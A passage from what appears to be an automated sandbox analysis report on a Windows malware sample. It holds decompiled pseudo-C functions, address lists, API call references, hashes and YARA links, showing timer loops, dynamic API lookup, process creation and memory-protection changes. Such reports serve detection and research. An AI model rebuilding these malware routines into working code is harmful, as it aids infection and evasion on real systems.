								_t71 = E013E3B55(0xffffffffffffffff, _v20, _v28, _v24); // executed
								_v52 = _t71;
								if(_t71 != 0 && _t71 != 0x10d2) {
									E013E55F1();
								}
								RtlFreeHeap( *0x13ed270, 0, _v48); // executed
								_t92 = 0;
							}
							HeapFree( *0x13ed270, _t92, _t97);
						}
						RtlFreeHeap( *0x13ed270, _t92, _a16); // executed
					}
					HeapFree( *0x13ed270, _t92, _v0);
				}
				RtlFreeHeap( *0x13ed270, _t92, _t83); // executed
				return _a4;
			}















































                              0x013e6367
                              0x013e6367
                              0x013e6367
                              0x013e6367
                              0x013e636d
                              0x013e6374
                              0x013e637c
                              0x013e637e
                              0x013e637e
                              0x013e638b
                              0x013e6396
                              0x013e6399
                              0x013e63a4
                              0x013e63a7
                              0x013e63ac
                              0x013e63af
                              0x013e63b4
                              0x013e63b7
                              0x013e63c3
                              0x013e63d0
                              0x013e63d2
                              0x013e63d8
                              0x013e63dd
                              0x013e63e8
                              0x013e63ea
                              0x013e63ed
                              0x013e63ef
                              0x013e63fc
                              0x013e6400
                              0x013e6403
                              0x013e6408
                              0x013e6413
                              0x013e6415
                              0x013e641c
                              0x013e6426
                              0x013e6426
                              0x013e6428
                              0x013e642f
                              0x013e6433
                              0x013e6436
                              0x013e643b
                              0x013e6445
                              0x013e6456
                              0x013e6456
                              0x013e6458
                              0x013e6466
                              0x013e646b
                              0x013e646f
                              0x013e6473
                              0x013e6485
                              0x013e648d
                              0x013e6491
                              0x013e649d
                              0x013e64a2
                              0x013e64ab
                              0x013e64bc
                              0x013e64c0
                              0x013e64c9
                              0x013e64cf
                              0x013e64d7
                              0x013e64dc
                              0x013e64e9
                              0x013e64ef
                              0x013e64fb
                              0x013e6501
                              0x013e6502
                              0x013e6509
                              0x013e650d
                              0x013e6513
                              0x013e651a
                              0x013e6524
                              0x013e652a
                              0x013e6534
                              0x013e653b
                              0x013e6549
                              0x013e6550
                              0x013e6554
                              0x013e655d
                              0x013e655d
                              0x013e656e
                              0x013e6570
                              0x013e6570
                              0x013e657a
                              0x013e657a
                              0x013e6587
                              0x013e6587
                              0x013e6594
                              0x013e6594
                              0x013e659e
                              0x013e65ab

                              APIs
                              • GetTickCount.KERNEL32 ref: 013E637E
                                • Part of subcall function 013EA7FB: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,?,?,74785520,013E64DC,?,03AD95B0), ref: 013EA826
                                • Part of subcall function 013EA7FB: lstrlen.KERNEL32(?,?,74785520,013E64DC,?,03AD95B0), ref: 013EA82E
                                • Part of subcall function 013EA7FB: strcpy.NTDLL ref: 013EA845
                                • Part of subcall function 013EA7FB: lstrcat.KERNEL32(00000000,?), ref: 013EA850
                                • Part of subcall function 013EA7FB: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,013E64DC,?,74785520,013E64DC,?,03AD95B0), ref: 013EA86D
                              • wsprintfA.USER32 ref: 013E63CB
                              • wsprintfA.USER32 ref: 013E63E8
                              • wsprintfA.USER32 ref: 013E6413
                              • HeapFree.KERNEL32(00000000,?), ref: 013E6426
                              • wsprintfA.USER32 ref: 013E6445
                              • HeapFree.KERNEL32(00000000,?), ref: 013E6456
                              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 013E6485
                              • GetTickCount.KERNEL32 ref: 013E6497
                              • RtlEnterCriticalSection.NTDLL(03AD9570), ref: 013E64AB
                              • RtlLeaveCriticalSection.NTDLL(03AD9570), ref: 013E64C9
                              • StrTrimA.SHLWAPI(00000000,013EC2AC,?,03AD95B0), ref: 013E64FB
                                • Part of subcall function 013E6F6D: lstrlen.KERNEL32(03AD9B58,00000000,00000000,?,013E6507,00000000), ref: 013E6F7D
                                • Part of subcall function 013E6F6D: lstrlen.KERNEL32(?), ref: 013E6F85
                                • Part of subcall function 013E6F6D: lstrcpy.KERNEL32(00000000,03AD9B58), ref: 013E6F99
                                • Part of subcall function 013E6F6D: lstrcat.KERNEL32(00000000,?), ref: 013E6FA4
                              • lstrcpy.KERNEL32(00000000,?), ref: 013E651A
                              • lstrcpy.KERNEL32(?,?), ref: 013E6524
                              • lstrcat.KERNEL32(?,?), ref: 013E6534
                              • lstrcat.KERNEL32(?,00000000), ref: 013E653B
                              • RtlFreeHeap.NTDLL(00000000,?,?,?,?), ref: 013E656E
                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 013E657A
                              • RtlFreeHeap.NTDLL(00000000,?,?,03AD95B0), ref: 013E6587
                              • HeapFree.KERNEL32(00000000,?), ref: 013E6594
                              • RtlFreeHeap.NTDLL(00000000,?), ref: 013E659E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Heap$Free$lstrcatlstrlenwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                              • String ID: Uxt
                              • API String ID: 1384543093-1536154274
                              • Opcode ID: d5b6136bce220d052b3314500e7d142249b08835691ec640f913dd79e1c04576
                              • Instruction ID: c573b5d0570cf15030c5dc51696779caca6706a91cd86c6e01964b73c6d13cee
                              • Opcode Fuzzy Hash: d5b6136bce220d052b3314500e7d142249b08835691ec640f913dd79e1c04576
                              • Instruction Fuzzy Hash: F05179B1500314AFDB31ABA9DC49E5A7FEDFF88358F090825F548DA2E4CA31D919CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E5038, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 152timememoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 83%
                              			E013E5038(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				intOrPtr _v120;
				struct %anon52 _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				struct %anon52 _t65;
				intOrPtr _t67;
				void* _t68;
				void* _t72;
				signed int _t73;
				void* _t75;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t75 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x13ed278);
					_v76 = 0;
					_v80 = 0;
					L013EB030();
					_v84.LowPart = _t46;
					_v80 = _t75;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x13ed2a4; // 0x2a0
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x13ed284 = 5;
						} else {
							_t68 = E013E4C56(_t75); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x13ed298 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t73 = _v104.LowPart;
						_t58 = _t73 << 4;
						_t78 = _t89 + (_t73 << 4) + 0x3c;
						_t74 = _t73 + 1;
						_v92.LowPart = _t73 + 1;
						_t60 = E013E5B5B(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
						_v128.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v92;
						_t97 = _t65 - 3;
						_v104.LowPart = _t65;
						if(_t65 != 3) {
							goto L6;
						} else {
							_t67 = E013E6006(_t74, _t97,  &_v72, _a4, _a8); // executed
							_v120 = _t67;
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x13ed27c);
							goto L21;
						} else {
							__eflags =  *0x13ed280; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E013E55F1();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x13ed280);
								L21:
								L013EB030();
								_v104.LowPart = _t60;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								__eflags = _t64;
								_v128 = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t72 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							RtlFreeHeap( *0x13ed270, 0, _t54); // executed
						}
						_t82 =  &(_t82[4]);
						_t72 = _t72 - 1;
					} while (_t72 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}

































                              0x013e5038
                              0x013e504e
                              0x013e5052
                              0x013e5057
                              0x013e505e
                              0x013e5066
                              0x013e506a
                              0x013e51f2
                              0x013e5070
                              0x013e5070
                              0x013e5072
                              0x013e5077
                              0x013e5078
                              0x013e507e
                              0x013e5082
                              0x013e5086
                              0x013e5094
                              0x013e50a2
                              0x013e50a6
                              0x013e50a8
                              0x013e50b5
                              0x013e50c1
                              0x013e50c5
                              0x013e50c9
                              0x013e50d2
                              0x013e50dd
                              0x013e50dd
                              0x013e50d4
                              0x013e50d4
                              0x013e50db
                              0x00000000
                              0x00000000
                              0x013e50db
                              0x013e50e7
                              0x00000000
                              0x013e50eb
                              0x013e50f0
                              0x013e50fb
                              0x013e50fb
                              0x013e5103
                              0x013e510e
                              0x013e5116
                              0x013e511f
                              0x013e5122
                              0x013e5126
                              0x013e512d
                              0x013e5131
                              0x00000000
                              0x00000000
                              0x013e5133
                              0x013e5137
                              0x013e513a
                              0x013e513e
                              0x00000000
                              0x013e5140
                              0x013e514b
                              0x013e5150
                              0x013e5150
                              0x00000000
                              0x013e5181
                              0x013e5181
                              0x013e5186
                              0x013e51a5
                              0x013e51a7
                              0x013e51ac
                              0x013e51ad
                              0x00000000
                              0x013e5188
                              0x013e5188
                              0x013e518e
                              0x00000000
                              0x013e5190
                              0x013e5190
                              0x013e5195
                              0x013e5197
                              0x013e519c
                              0x013e519d
                              0x013e51b3
                              0x013e51b3
                              0x013e51bb
                              0x013e51c9
                              0x013e51cd
                              0x013e51d9
                              0x013e51db
                              0x013e51dd
                              0x013e51e1
                              0x00000000
                              0x013e51e7
                              0x00000000
                              0x013e51e7
                              0x013e51e1
                              0x013e518e
                              0x00000000
                              0x013e5186
                              0x013e5154
                              0x013e5156
                              0x013e515a
                              0x013e515b
                              0x013e515b
                              0x013e515f
                              0x013e5169
                              0x013e5169
                              0x013e516f
                              0x013e5172
                              0x013e5172
                              0x013e5179
                              0x013e5179
                              0x013e5200
                              0x00000000

                              APIs
                              • memset.NTDLL ref: 013E5052
                              • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 013E505E
                              • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 013E5086
                              • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 013E50A6
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,013E5A39,?), ref: 013E50C1
                              • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,013E5A39,?,00000000), ref: 013E5169
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,013E5A39,?,00000000,?,?), ref: 013E5179
                              • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 013E51B3
                              • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 013E51CD
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 013E51D9
                                • Part of subcall function 013E4C56: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03AD93B8,00000000,?,747DF710,00000000,747DF730), ref: 013E4CA5
                                • Part of subcall function 013E4C56: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,03AD93F0,?,00000000,30314549,00000014,004F0053,03AD93AC), ref: 013E4D42
                                • Part of subcall function 013E4C56: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,013E50D9), ref: 013E4D54
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,013E5A39,?,00000000,?,?), ref: 013E51EC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                              • String ID: Uxt
                              • API String ID: 3521023985-1536154274
                              • Opcode ID: 45b53e15170e20d2a2f80be0b0c77020974b73d9e17a5d67faefe71e0ced8229
                              • Instruction ID: 06162b0834dd28bd801540e83c7ac3b5aa75454abf23f0132e8db5a799b01388
                              • Opcode Fuzzy Hash: 45b53e15170e20d2a2f80be0b0c77020974b73d9e17a5d67faefe71e0ced8229
                              • Instruction Fuzzy Hash: FB517B75409321AFDB219F599C4899BBFECEF85368F108A1AF464D62D0D770D904CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010422AA, Relevance: 21.1, APIs: 14, Instructions: 121memorysynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,01042516), ref: 010422D3
                              • RtlDeleteCriticalSection.NTDLL(01050440), ref: 01042306
                              • RtlDeleteCriticalSection.NTDLL(01050460), ref: 0104230D
                              • ReleaseMutex.KERNEL32(00000768,00000000,?,?,?,01042516), ref: 01042335
                              • CloseHandle.KERNEL32(?,?,01042516), ref: 01042341
                              • ResetEvent.KERNEL32(00000000,00000000,?,?,?,01042516), ref: 0104234D
                              • CloseHandle.KERNEL32(?,?,01042516), ref: 01042359
                              • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,01042516), ref: 0104235F
                              • SleepEx.KERNEL32(00000064,00000001,?,?,01042516), ref: 01042373
                              • HeapFree.KERNEL32(00000000,00000000,?,?,01042516), ref: 01042396
                              • RtlRemoveVectoredExceptionHandler.NTDLL(00F9D858), ref: 010423D0
                              • SleepEx.KERNEL32(00000064,00000001,?,?,01042516), ref: 010423DF
                              • CloseHandle.KERNEL32(04B3F068,?,?,01042516), ref: 01042406
                              • LocalFree.KERNEL32(?,?,01042516), ref: 01042416
                                • Part of subcall function 01034132: GetVersion.KERNEL32(?,00000000,747DF720,?,010422C4,00000000,?,?,?,01042516), ref: 01034156
                                • Part of subcall function 01034132: GetModuleHandleA.KERNEL32(?,04B39723,?,010422C4,00000000,?,?,?,01042516), ref: 01034173
                                • Part of subcall function 01034132: GetProcAddress.KERNEL32(00000000), ref: 0103417A
                                • Part of subcall function 01043BE1: RtlEnterCriticalSection.NTDLL(01050460), ref: 01043BEB
                                • Part of subcall function 01043BE1: RtlLeaveCriticalSection.NTDLL(01050460), ref: 01043C27
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalHandleSectionSleep$Close$DeleteFree$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
                              • String ID:
                              • API String ID: 1765366784-0
                              • Opcode ID: 8b81513206af8200a2fd0bdbb3ae47bb8ee3f3bb1d6b40da844dbec9b11385bc
                              • Instruction ID: 90435fc94c1e3853f899967ae2df5956cad116bc66104426a6cb823a387ba872
                              • Opcode Fuzzy Hash: 8b81513206af8200a2fd0bdbb3ae47bb8ee3f3bb1d6b40da844dbec9b11385bc
                              • Instruction Fuzzy Hash: F9414FB1740302ABEB70AF69EDC4A5E7BEABB00741B1544B4F6C5D715CCB7B98808B25
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01034CC6, Relevance: 15.1, APIs: 10, Instructions: 117memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(0104F4B4,?,00000000,?,0102B2DF,0104F4E4,?,?,00000004,00000000), ref: 01034D13
                              • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-00000020,?,00000000,?,0102B2DF,0104F4E4,?,?,00000004,00000000), ref: 01034D25
                              • lstrcpy.KERNEL32(00000000,0104F4B4), ref: 01034D34
                              • VirtualProtect.KERNELBASE(00000000,00000000,?,-00000020,?,00000000,?,0102B2DF,0104F4E4,?,?,00000004,00000000), ref: 01034D45
                              • VirtualProtect.KERNELBASE(?,00000005,00000040,-00000020,0104C508,00000018,010235A8,?,00000000,?,0102B2DF,0104F4E4,?,?,00000004,00000000), ref: 01034D7B
                              • VirtualProtect.KERNELBASE(?,00000004,?,-00000020,?,00000000,?,0102B2DF,0104F4E4,?,?,00000004,00000000), ref: 01034D96
                              • VirtualProtect.KERNEL32(?,00000004,00000040,-00000020,0104C508,00000018,010235A8,?,00000000,?,0102B2DF,0104F4E4,?,?,00000004,00000000), ref: 01034DAB
                              • VirtualProtect.KERNELBASE(?,00000004,00000040,-00000020,0104C508,00000018,010235A8,?,00000000,?,0102B2DF,0104F4E4,?,?,00000004,00000000), ref: 01034DD8
                              • VirtualProtect.KERNELBASE(?,00000004,?,-00000020,?,00000000,?,0102B2DF,0104F4E4,?,?,00000004,00000000), ref: 01034DF2
                              • GetLastError.KERNEL32(?,00000000,?,0102B2DF,0104F4E4,?,?,00000004,00000000), ref: 01034DF9
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                              • String ID:
                              • API String ID: 3676034644-0
                              • Opcode ID: 00c8e1c57088f2aeeec05648454cdf54fc0eb955d5a0d70bb871e583c524f5f3
                              • Instruction ID: 34de78928e58308c705567f52409dd8d7df1ba8850c857c5c72eff9045f2f008
                              • Opcode Fuzzy Hash: 00c8e1c57088f2aeeec05648454cdf54fc0eb955d5a0d70bb871e583c524f5f3
                              • Instruction Fuzzy Hash: 404100B19406059FEB319F65CD84EAABBF9FB48310F008655E692EB5A4D735E805CB20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E87A1, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109librarymemoryloaderCOMMON
                              Download Yara Rule
                              C-Code - Quality: 73%
                              			E013E87A1(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E013E6CE5(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E013EAA99( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x13ed298 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x13ed2b8; // 0x26ea5a8
					_t18 = _t47 + 0x13ee3b3; // 0x73797325
					_t68 = E013E70F1(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x13ed2b8; // 0x26ea5a8
						_t19 = _t50 + 0x13ee760; // 0x3ad8d08
						_t20 = _t50 + 0x13ee0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E013E2522();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
							_push(1);
							E013E2522();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x13ed270, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E013E6DFA(_t70);
				goto L12;
			}


















                              0x013e87a9
                              0x013e87a9
                              0x013e87b8
                              0x013e87c1
                              0x013e87c4
                              0x013e88d1
                              0x013e88d8
                              0x013e88d8
                              0x013e87d3
                              0x013e87db
                              0x013e87e0
                              0x013e87e3
                              0x013e87f8
                              0x013e87fe
                              0x013e87ff
                              0x013e8802
                              0x013e8808
                              0x013e880b
                              0x013e8810
                              0x013e8818
                              0x013e8824
                              0x013e8828
                              0x013e88b8
                              0x013e882e
                              0x013e882e
                              0x013e8833
                              0x013e883a
                              0x013e884e
                              0x013e8852
                              0x013e88a1
                              0x013e8854
                              0x013e8855
                              0x013e885c
                              0x013e8875
                              0x013e8877
                              0x013e887b
                              0x013e8882
                              0x013e889c
                              0x013e8884
                              0x013e888d
                              0x013e8892
                              0x013e8892
                              0x013e8882
                              0x013e88b0
                              0x013e88b0
                              0x013e8828
                              0x013e88bf
                              0x013e88c8
                              0x013e88cc
                              0x00000000

                              APIs
                                • Part of subcall function 013E6CE5: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,013E87BD,?,?,?,?,00000000,00000000), ref: 013E6D0A
                                • Part of subcall function 013E6CE5: GetProcAddress.KERNEL32(00000000,7243775A), ref: 013E6D2C
                                • Part of subcall function 013E6CE5: GetProcAddress.KERNEL32(00000000,614D775A), ref: 013E6D42
                                • Part of subcall function 013E6CE5: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 013E6D58
                                • Part of subcall function 013E6CE5: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 013E6D6E
                                • Part of subcall function 013E6CE5: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 013E6D84
                              • memset.NTDLL ref: 013E880B
                                • Part of subcall function 013E70F1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,013E8824,73797325), ref: 013E7102
                                • Part of subcall function 013E70F1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 013E711C
                              • GetModuleHandleA.KERNEL32(4E52454B,03AD8D08,73797325), ref: 013E8841
                              • GetProcAddress.KERNEL32(00000000), ref: 013E8848
                              • HeapFree.KERNEL32(00000000,00000000), ref: 013E88B0
                                • Part of subcall function 013E2522: GetProcAddress.KERNEL32(36776F57,013E6342), ref: 013E253D
                              • CloseHandle.KERNEL32(00000000,00000001), ref: 013E888D
                              • CloseHandle.KERNEL32(?), ref: 013E8892
                              • GetLastError.KERNEL32(00000001), ref: 013E8896
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                              • String ID: Uxt
                              • API String ID: 3075724336-1536154274
                              • Opcode ID: 2ab808b8166761c050fe77f6c1a3f7e8710be627f9160c12019456d5cea2dcbc
                              • Instruction ID: 397a4d072fc68221cc0ea44c6a03167b93f87ee6ea9b162c2d9edafc55d6e39c
                              • Opcode Fuzzy Hash: 2ab808b8166761c050fe77f6c1a3f7e8710be627f9160c12019456d5cea2dcbc
                              • Instruction Fuzzy Hash: E1313DB6C00319EFDB219FA8DC88D9EBFFCEB04358F1444A5EA06A7191D7309D448B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102ADDF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 01044E7E: VirtualProtect.KERNELBASE(?,?,00000040,00000000,03AE75A8,?,00000000,03AE75A8,?,0102B24B,00000004,00000000), ref: 01044EA3
                                • Part of subcall function 01044E7E: GetLastError.KERNEL32(?,00000000,03AE75A8,?,0102B24B,00000004,00000000), ref: 01044EAB
                                • Part of subcall function 01044E7E: VirtualQuery.KERNEL32(?,03AE75A8,0000001C,?,00000000,03AE75A8,?,0102B24B,00000004,00000000), ref: 01044EC2
                                • Part of subcall function 01044E7E: VirtualProtect.KERNEL32(?,?,-2C9B417C,00000000,?,00000000,03AE75A8,?,0102B24B,00000004,00000000), ref: 01044EE7
                              • GetLastError.KERNEL32(00000000,00000004,0104F518,?,0104F4B4,00000000,00000002,0104C578,0000001C,0103496D,00000002,?,00000001,?,0104F514,?), ref: 0102AF38
                                • Part of subcall function 01034B11: lstrlen.KERNEL32(?,00000004,0102B24B,00000004,00000000), ref: 01034B49
                                • Part of subcall function 01034B11: lstrcpy.KERNEL32(00000000,?), ref: 01034B60
                                • Part of subcall function 01034B11: StrChrA.SHLWAPI(00000000,0000002E), ref: 01034B69
                                • Part of subcall function 01034B11: GetModuleHandleA.KERNEL32(00000000), ref: 01034B87
                              • VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,00000400,?,?,?,00000000,00000000,00000004,0104F518,?,0104F4B4), ref: 0102AEB6
                              • VirtualProtect.KERNELBASE(00000000,00000004,0104F518,0104F518,?,00000000,00000000,00000004,0104F518,?,0104F4B4,00000000,00000002,0104C578,0000001C,0103496D), ref: 0102AED1
                              • RtlEnterCriticalSection.NTDLL(01050460), ref: 0102AEF5
                              • RtlLeaveCriticalSection.NTDLL(01050460), ref: 0102AF13
                                • Part of subcall function 01044E7E: SetLastError.KERNEL32(?,?,00000000,03AE75A8,?,0102B24B,00000004,00000000), ref: 01044EF0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                              • String ID:
                              • API String ID: 899430048-3916222277
                              • Opcode ID: 46c2f77989508eff1bd86a23af1e3b2ca5cff0f3924cafd838dac1965c876a4a
                              • Instruction ID: 71b8048b95f796d54cb298aff787320f6a357961dd5480b790d7df1d28884b0c
                              • Opcode Fuzzy Hash: 46c2f77989508eff1bd86a23af1e3b2ca5cff0f3924cafd838dac1965c876a4a
                              • Instruction Fuzzy Hash: 9C417EB1A00619EFDB50DF98C984A9EBBF4FF48310F008159F995AB694DB34E941CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010343EF, Relevance: 10.6, APIs: 7, Instructions: 110memorystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 010467CD: GetProcAddress.KERNEL32(?,00000318), ref: 010467F2
                                • Part of subcall function 010467CD: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 0104680E
                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 01034428
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 01034513
                                • Part of subcall function 010467CD: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 01046978
                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 0103445E
                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0103446A
                              • lstrcmpi.KERNEL32(?,00000000), ref: 010344A7
                              • StrChrA.SHLWAPI(?,0000002E), ref: 010344B0
                              • lstrcmpi.KERNEL32(?,00000000), ref: 010344C2
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                              • String ID:
                              • API String ID: 3901270786-0
                              • Opcode ID: 9d10e3943799b492802ee2780554464189a8b34221e91b39e33876a03c7b3401
                              • Instruction ID: da198ca2ca6c74152a8cd154df726130aa39b49da76f82f8b48d816949ec6af0
                              • Opcode Fuzzy Hash: 9d10e3943799b492802ee2780554464189a8b34221e91b39e33876a03c7b3401
